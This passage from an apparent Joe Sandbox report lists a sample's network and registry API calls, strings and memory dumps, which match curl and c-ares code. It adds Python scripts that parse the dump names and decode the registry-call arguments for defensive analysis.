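EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}
# MEMORY_BASIC_INFORMATION.Type values.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed (not documented here) layout of a Joe Sandbox dump name, eight hex fields:
#   <pid>.<stage>.<dump id>.<base address>.<protection>.<field 6>.<type>.<field 8>.sdmp
# Only fields 4, 5 and 7 are interpreted; everything else is kept as-is.
SDMP_NAME = re.compile(r"(?P<fields>(?:[0-9A-Fa-f]+\.){7}[0-9A-Fa-f]+)\.sdmp")

# Sample input: the Memory Dump Source list of the function above, copied from the report.
MEMORY_DUMP_SOURCE = """\
• Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
"""


@dataclass(frozen=True)
class DumpRegion:
    name: str       # full .sdmp file name
    base: int       # region base address (field 4)
    protect: int    # page protection (field 5)
    mem_type: int   # MEM_IMAGE / MEM_MAPPED / MEM_PRIVATE (field 7)

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def writable_and_executable(self) -> bool:
        p = self.protect & 0xFF
        return p in EXECUTABLE and p in WRITABLE


def parse_dump_name(line: str) -> DumpRegion:
    """Decode one 'Source File:' or 'Associated:' line; ValueError if it names no dump."""
    m = SDMP_NAME.search(line)
    if m is None:
        raise ValueError(f"no .sdmp name in line: {line!r}")
    f = m.group("fields").split(".")
    return DumpRegion(name=m.group(0), base=int(f[3], 16),
                      protect=int(f[4], 16), mem_type=int(f[6], 16))


def parse_dump_list(text: str) -> list:
    """All dump regions named in a Memory Dump Source block, in listed order."""
    return [parse_dump_name(line) for line in text.splitlines() if ".sdmp" in line]


def rwx_image_regions(regions) -> list:
    """Bases of image-backed regions that are both writable and executable."""
    return [r.base for r in regions
            if r.writable_and_executable and r.mem_type == 0x1000000]


if __name__ == "__main__":
    regions = parse_dump_list(MEMORY_DUMP_SOURCE)
    for r in regions:
        print(f"{r.base:08X}  {r.protect_name:24} {r.type_name}")
    print("writable+executable image regions:", [hex(b) for b in rwx_image_regions(regions)])
```

Run stand-alone it prints one row per dump; of the 16 regions in this list only 004B0000 and 00AC8000 are plain PAGE_READWRITE, the rest are executable and writable.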

                                                              Control-flow Graph
                                                              • Function at 4c6fa0 (basic blocks 4c6fa0-4c7346; rendered as an image, edge list not reproduced). Calls: 4cd7f0 and select (block 4c71f1), __WSAFDIsSet (blocks 4c726b, 4c729a, 4c72ba). Called from the WSAEventSelect/WSAEnumNetworkEvents function above (block 4c0839).
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: same 15 dumps (004B0000 through 01006000) as listed for the function above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d12d577204c7d0f123ad0f143e8a658b26f0c34e053d3a8979e450b6cf480488
                                                              • Instruction ID: b92017dac8c059962176123465810c27540038b4227d266adb22740d268dc496
                                                              • Opcode Fuzzy Hash: d12d577204c7d0f123ad0f143e8a658b26f0c34e053d3a8979e450b6cf480488
                                                              • Instruction Fuzzy Hash: 5591173860D3454BD7758A29C880BBB72D5FFC4360F148B2EE899432D4EB799C41DA86

                                                              Control-flow Graph
                                                              • Function at 57b180 (basic blocks 57b180-57b589; rendered as an image, edge list not reproduced). Internal calls: 57af30, 57b060, 838b00, 57b590, 57b020, 57b660, 57b770 (twice), 57b870 (twice). Import: getsockname (block 57b2a9).
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 0057B2B6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: same 15 dumps (004B0000 through 01006000) as listed for the first function above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: ff3c62036edd43128a74fa7a630a0566c8192709c50b0b3e6cf3e9e03aca89f8
                                                              • Instruction ID: ecadfa5c6329743da7131765cdff8a81f8279371b51f4ddf341a569c30dd3d14
                                                              • Opcode Fuzzy Hash: ff3c62036edd43128a74fa7a630a0566c8192709c50b0b3e6cf3e9e03aca89f8
                                                              • Instruction Fuzzy Hash: C0C16F716053059FEB18DF28D884B6A7BE1BF88314F05C968E8499B3A2E731ED45DB81
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0056712E,?,?,?,00001001,00000000), ref: 0057A90D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: same 15 dumps (004B0000 through 01006000) as listed for the first function above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: recvfrom
                                                              • String ID:
                                                              • API String ID: 846543921-0
                                                              • Opcode ID: 0ebdc7364d7df4b9eed5c432c8b4cf46feb2ab5c886190ab9f97e31f4a7be29d
                                                              • Instruction ID: a412551e074acf5ab1a947eacffadf24f988bb23b5752032f393030a08d5587f
                                                              • Opcode Fuzzy Hash: 0ebdc7364d7df4b9eed5c432c8b4cf46feb2ab5c886190ab9f97e31f4a7be29d
                                                              • Instruction Fuzzy Hash: E1F06D75118308AFD2109F01EC88D6BBBEDFFC9754F05895DF94C132118270AE10DAB2
                                                              APIs
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A499
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A4FB
                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A531
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0056AA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0056AA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0056AA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0056AAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0056AB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 0056AB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0056AB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0056AC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0056AD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 0056AD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 0056ADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 0056AE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0056AE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0056AE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0056AF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0056AFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0056B072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: same 15 dumps (004B0000 through 01006000) as listed for the first function above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4281207131-1047472027
                                                              • Opcode ID: 311554f64cf0d8c3885da9313aaa294a0b2001f8e0ba7c6a374f38497261b565
                                                              • Instruction ID: 3742219d43596185b9d20ebfdc09d7b45dac6a66391927f2cd97ad28149e9505
                                                              • Opcode Fuzzy Hash: 311554f64cf0d8c3885da9313aaa294a0b2001f8e0ba7c6a374f38497261b565
                                                              • Instruction Fuzzy Hash: F4729FB1604341AFE720DB24DC85B6BBBE8BF85704F144928F985E72A2E771E944CB53
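Added example, not from the Joe Sandbox report: a parser for the APIs lines above that decodes the registry arguments (the hKey root and the samDesired access mask) and collects the key paths opened and value names read. The sample input is the twenty API lines of this function copied from the report; a "?" argument is one the sandbox could not resolve and is reported as unknown rather than guessed. The paths are the standard locations of the Windows DNS client configuration (SearchList and Domain under Tcpip\Parameters, per-interface DhcpDomain under Parameters\Interfaces, and the two DNSClient group-policy keys) and, with GetAdaptersAddresses and the ares__sortaddrinfo.c string in the function above, match the c-ares resolver library's Windows system-configuration code. Reading these keys is expected from a statically linked resolver and is not by itself evidence of data theft; the parser makes that distinction quick to draw from a report.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One entry of a Joe Sandbox "APIs" list, e.g.
#   • RegOpenKeyExA.KERNELBASE(80000002,System\...\Tcpip\Parameters,00000000,00020019,?), ref: 0056AA19
#   • RegEnumKeyExA.KERNELBASE ref: 0056AD8D          <- no argument list recorded
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Predefined registry roots and access masks (winreg.h); anything else stays raw hex.
REG_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
             0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_ACCESS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x8: "KEY_ENUMERATE_SUB_KEYS",
              0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

# Sample input: the APIs block of the function above, copied from the report.
REPORT_API_LINES = r"""APIs
• GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A499
• GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A4FB
• GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0056A531
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0056AA19
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0056AA4C
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0056AA97
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0056AAE9
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0056AB30
• RegCloseKey.KERNELBASE(?), ref: 0056AB6A
• RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0056AB82
• RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0056AC46
• RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0056AD0A
• RegEnumKeyExA.KERNELBASE ref: 0056AD8D
• RegCloseKey.KERNELBASE(?), ref: 0056ADD9
• RegEnumKeyExA.KERNELBASE ref: 0056AE08
• RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0056AE2A
• RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0056AE54
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0056AF63
• RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0056AFB2
• RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0056B072
"""


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple      # raw argument strings; "?" = unresolved by the sandbox
    ref: int         # call-site address inside the dumped image

    def arg(self, i: int) -> Optional[str]:
        """Argument i, or None when it is absent or unresolved."""
        if i >= len(self.args) or self.args[i] == "?":
            return None
        return self.args[i]


@dataclass(frozen=True)
class RegKeyOpen:
    root: Optional[str]    # decoded hKey root, None if not a predefined root or unresolved
    path: Optional[str]    # lpSubKey, None if unresolved
    access: str            # decoded samDesired, raw hex if not a known mask
    ref: int


def parse_api_lines(text: str) -> list:
    """Parse every recognisable API line; headers and unrelated lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw is not None else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def registry_summary(calls) -> dict:
    """Keys opened (RegOpenKeyEx*) and value names read (RegQueryValueEx*), decoded."""
    opens, values = [], set()
    for c in calls:
        if c.api.startswith("RegOpenKeyEx"):
            root_raw, access_raw = c.arg(0), c.arg(3)   # hKey, samDesired
            root = REG_ROOTS.get(int(root_raw, 16)) if root_raw else None
            access = REG_ACCESS.get(int(access_raw, 16), access_raw) if access_raw else "?"
            opens.append(RegKeyOpen(root, c.arg(1), access, c.ref))
        elif c.api.startswith("RegQueryValueEx"):
            name = c.arg(1)                             # lpValueName
            if name:
                values.add(name)
    return {"keys_opened": opens, "values_queried": sorted(values),
            "calls_by_module": Counter(c.module for c in calls)}


if __name__ == "__main__":
    summary = registry_summary(parse_api_lines(REPORT_API_LINES))
    for k in summary["keys_opened"]:
        print(f"{k.ref:08X}  {k.root or '?'}\\{k.path or '?'}  [{k.access}]")
    print("values read:", summary["values_queried"])
    print("calls by module:", dict(summary["calls_by_module"]))
```

For this function the output is four KEY_READ opens under HKEY_LOCAL_MACHINE, one open of an unresolved per-interface subkey with KEY_QUERY_VALUE, and the value names DhcpDomain, Domain and SearchList; no write access is requested anywhere in the list.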
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 004EA832
                                                              Strings
                                                              • Trying [%s]:%d..., xrefs: 004EA689
                                                              • Bind to local port %d failed, trying next, xrefs: 004EAFE5
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 004EAE60
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 004EAE1F
                                                              • Could not set TCP_NODELAY: %s, xrefs: 004EA871
                                                              • @, xrefs: 004EAC42
                                                              • Local port: %hu, xrefs: 004EAF28
                                                              • bind failed with errno %d: %s, xrefs: 004EB080
                                                              • cf-socket.c, xrefs: 004EA5CD, 004EA735
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 004EA796
                                                              • @, xrefs: 004EA8F4
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 004EA6CE
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 004EADAC
                                                              • Trying %s:%d..., xrefs: 004EA7C2, 004EA7DE
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 004EAD0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              • Associated: same 15 dumps (004B0000 through 01006000) as listed for the first function above
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: f38f91354390c65239385882d774b530d0c5d75755508c20877b0e6038c35a54
                                                              • Instruction ID: a3234e26dc7b71a69dd6054f2b06eeaf7de72d762fc0991a5675b1ad1fedcdb6
                                                              • Opcode Fuzzy Hash: f38f91354390c65239385882d774b530d0c5d75755508c20877b0e6038c35a54
                                                              • Instruction Fuzzy Hash: EF622371504381ABE720CF25CC46BABB7E4BF80309F04492EF98897292E775E855CB97

                                                               Control-flow Graph
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00579946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00579974
                                                              • RegCloseKey.KERNELBASE(?), ref: 0057998B
                                                              Strings
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                              • API String ID: 3677997916-615551945
                                                              • Opcode ID: ac319f2e8b5b4fc00f3934523f8e175d22c73d219a19b3e2c394fe39b2aedd41
                                                              • Instruction ID: 5f46e68ba9414b78bff055fd0a91b5d41f29177e26ba30fc7b1d41d85173337c
                                                              • Opcode Fuzzy Hash: ac319f2e8b5b4fc00f3934523f8e175d22c73d219a19b3e2c394fe39b2aedd41
                                                              • Instruction Fuzzy Hash: FC3297B59052025BEB11AB24FC46A1B7EA5BF95314F088834F90D97263F731ED14E7A3

                                                               Control-flow Graph
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 004E8C30
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 004E8CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 004E8D0F
                                                              Strings
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: 8d6202968f86a8674a1d9505dde625f57a2713137a5139ee379a4d0f428742f1
                                                              • Instruction ID: 8bc2d12c6c4e4b9fc1c368be105bd357043863bad2d74b599f80f8eeb18bd38d
                                                              • Opcode Fuzzy Hash: 8d6202968f86a8674a1d9505dde625f57a2713137a5139ee379a4d0f428742f1
                                                              • Instruction Fuzzy Hash: 47B1C0706043899FDB10CF26C985BA7B7A0AF41319F14852EF85D8B3D2DB78E854C766

                                                               Control-flow Graph
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: EnumOpen
                                                              • String ID: d
                                                              • API String ID: 3231578192-2564639436
                                                              • Opcode ID: de320e160b953cc180c3d57efac4164e36a3fceec7e84989b0125a9230aabd0b
                                                              • Instruction ID: f4ecb7cd57639d43258ec9e356dff2b95bfce9d6dc6668facae65cf6a5f40160
                                                              • Opcode Fuzzy Hash: de320e160b953cc180c3d57efac4164e36a3fceec7e84989b0125a9230aabd0b
                                                              • Instruction Fuzzy Hash: EB71B2B49043199FDB10EF69C58479EBBF0FF84308F10886DE89897311E7749A888F92

                                                               Control-flow Graph
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,N=K,00000000,?,?,004C07BF), ref: 004B76EB
                                                              Strings
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$N=K$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-3491406434
                                                              • Opcode ID: b22cb765e9d4674d62dce460d0befba41eb3e8e51b7aa88dc10252d27c2b2a9f
                                                              • Instruction ID: 2ea9d95becd5e1c96cccd57253c35b175aff90a55f29d115d9ff9b0d138a9571
                                                              • Opcode Fuzzy Hash: b22cb765e9d4674d62dce460d0befba41eb3e8e51b7aa88dc10252d27c2b2a9f
                                                              • Instruction Fuzzy Hash: 09113DF1608304BFD520A755ACC6D7B3F5CDBC2B2CF440A19FC4453352E5559C0182B2

                                                               Control-flow Graph
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 004E935D
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 004E9388
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                               • Associated: 00000000.00000002.1488470083.00000000004B0000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000960000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC3000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1488683123.0000000000AC5000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490331171.0000000000AC8000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000ACA000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000C56000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D5B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000D62000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E38000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E40000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490352991.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1490907125.0000000000E4F000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491260548.0000000001004000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1491345770.0000000001006000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: 6949be2ba137e5b0a668576c15c345bf62b484b5fea8429598147548d7b126ad
                                                              • Instruction ID: 291276faff11cf044e1878bd5886298282116c5db2ffa27e50909c9ca580c941
                                                              • Opcode Fuzzy Hash: 6949be2ba137e5b0a668576c15c345bf62b484b5fea8429598147548d7b126ad
                                                              • Instruction Fuzzy Hash: A451CD71A04345ABD710DF25C881FAAB7A5FF88318F14862AFD488B3D2E734ED518B95

                                                               Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed). Entry block 4b7770-4b778e; block 4b77b6 calls recv.
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: 42a6f2fdf3892d0a1d5afd489db3ed71ac6e1f0ade0aabbb28de01f7985c3969
                                                              • Instruction ID: 14b5d2ef498d125c47b75d900ee0fd0d695e53c658438711b1461e79717d6e34
                                                              • Opcode Fuzzy Hash: 42a6f2fdf3892d0a1d5afd489db3ed71ac6e1f0ade0aabbb28de01f7985c3969
                                                              • Instruction Fuzzy Hash: 8B112BF4608304BFE520E7199C8AE773F9CDBC6B5CF444619B84452352E5655C0181B2

                                                               Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed). Entry block 4b75e0-4b75ed; block 4b7607 calls socket.
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: fe59381f6c6cb4cd2cb2416d8a3b891338ed5d074c1e7590a377829143e6983b
                                                              • Instruction ID: 71977b201c81cc6d2baa872bbf8a78748514f1c44809c5d594848e10804fde0c
                                                              • Opcode Fuzzy Hash: fe59381f6c6cb4cd2cb2416d8a3b891338ed5d074c1e7590a377829143e6983b
                                                              • Instruction Fuzzy Hash: 2B112971B45211A7DA20676D6C86EAB3B98DBC1778F450525F840962B3E2568C5182F1

                                                               Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed). Entry block 4ea150-4ea159; block 4ea181 calls getsockname.
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 004EA1C7
                                                              Strings
                                                              • getsockname() failed with errno %d: %s, xrefs: 004EA1F0
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 004EA23B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3358416759-2605427207
                                                              • Opcode ID: b519f5d88328d594289ccc2416235d3582fb364d82f7565dd7ac1d79e755db86
                                                              • Instruction ID: 9a743e954db172bf3fae30a8f3e7d93f9403a8038af193b8536d0efac8e62d31
                                                              • Opcode Fuzzy Hash: b519f5d88328d594289ccc2416235d3582fb364d82f7565dd7ac1d79e755db86
                                                              • Instruction Fuzzy Hash: 3A21FB31808280AAF7219B19DC42FE777ACEF91328F004655FA9853151FB32695587E6

                                                               Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed). Entry block 4cd5e0-4cd5ee; block 4cd652 calls WSAStartup.
                                                              APIs
                                                              • WSAStartup.WS2_32(00000202), ref: 004CD65A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1488683123.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4b0000_Tsy9P2T9yF.jbxd
                                                              Similarity
                                                              • API ID: Startup
                                                              • String ID: if_nametoindex$iphlpapi.dll
